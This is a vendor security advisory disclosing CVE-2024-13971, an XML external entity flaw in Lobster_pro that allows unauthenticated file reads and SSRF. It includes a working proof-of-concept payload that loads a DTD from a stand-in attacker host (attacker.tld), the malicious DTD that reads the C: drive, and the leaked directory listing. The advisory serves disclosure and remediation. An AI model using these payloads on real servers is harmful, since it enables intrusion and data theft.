Advisory: Arbitrary File Read and Server Side Request Forgery via XML External Entities in Lobster_pro (CVE-2024-13971)

Release of SCHUTZWERK-SA-2024-005

April 30, 2026

preview-image for SCHUTZWERK-SA-2024-005

Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.

Metadata

Affected product: Lobster_pro
Affected version: versions prior to 4.12.6-GA
Vendor: Lobster DATA GmbH
Problem type(s): CWE-611 Improper Restriction of XML External Entity Reference
CVE ID: CVE-2024-13971
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-13971
CVSS 4.0 score: 7.7
Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/

Details

During a recent red team engagement, the no-code platform Lobster_pro was identified as part of the customer’s internet-facing assets.

The endpoint https://<lobster-pro instance>:443/system/web was found to process XML via HTTP POST requests. Sending the following payload and observing the attacker-controlled web server confirms that XML External Entities (XXE) are followed and loaded by the application:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lbsterq [
         <!ENTITY % lobster SYSTEM "http://attacker.tld/map.dtd">
%lobster;
]>
<properties>lobster</properties>

Serving the following file map.dtd, it is possible to retrieve file contents, directory listings or HTTP responses via the error message returned by the endpoint:

<!ENTITY % cfga SYSTEM "file:///c:">
<!ENTITY % eea "<!ENTITY &#x25; lobsterdata SYSTEM '#%cfga;'>">
%eea;
%lobsterdata;

The HTTP response contains an error message, embedding the file content or directory listing:

<?xml version="1.0" encoding="UTF-8"?>
<core:ErrorResponse xmlns:core="CORESYSTEM">
   <errorInfo>
      <errorCode>500</errorCode>
      <httpResponseStatus>200</httpResponseStatus>
      <locale>en</locale>
      <errorText>javax.xml.bind.UnmarshalException
 - with linked exception:
[Exception [EclipseLink-25004] (Eclipse Persistence Services - 2.7.8.qualifier): org.eclipse.persistence.exceptions.XMLMarshalException&#xd;
Exception Description: An error occurred unmarshalling the document&#xd;
Internal Exception: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[4,10]
Message: no protocol: #$Recycle.Bin
Config.Msi
[...]
pagefile.sys
PerfLogs
ProgramData
Program Files
Program Files (x86)
Programme
[...]
temp
Users
Windows
]</errorText>
      <errorType>java.io.IOException</errorType>
      <errorLevel>1</errorLevel>
   </errorInfo>
</core:ErrorResponse>

Due to the way content is included, some symbols (e.g., the percent sign %) lead to recursive entity declarations, thus preventing data exfiltration.

Risk

An attacker can use the vulnerability to gather information and, depending on the stored data, exfiltrate secrets from the file system and adjacent SMB shares. Furthermore, HTTP requests can be used for out-of-band exfiltration and server side request forgery (SSRF) attacks. Utilizing the SMB protocol could also enable leakage of the application user NTLM hash.

Solution/Mitigation

Update to Lobster_pro release 4.12.6-GA or higher.

Timeline

2024-08-12 Initial contact with vendor
2024-08-14 Vulnerability reported to vendor
2024-08-14 CVE ID requested
2024-08-22 Initial feedback received from vendor: unable to reproduce
2024-08-28 Vulnerability demonstrated in vendor’s “Community server”
2024-09-19 Vulnerability reported fixed by vendor in Lobster_pro release 4.12.6-GA
2025-07-03 Reserved CVE ID CVE-2024-13971
2026-04-30 Advisory released

Credits

The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.

~ Marcelo Reyes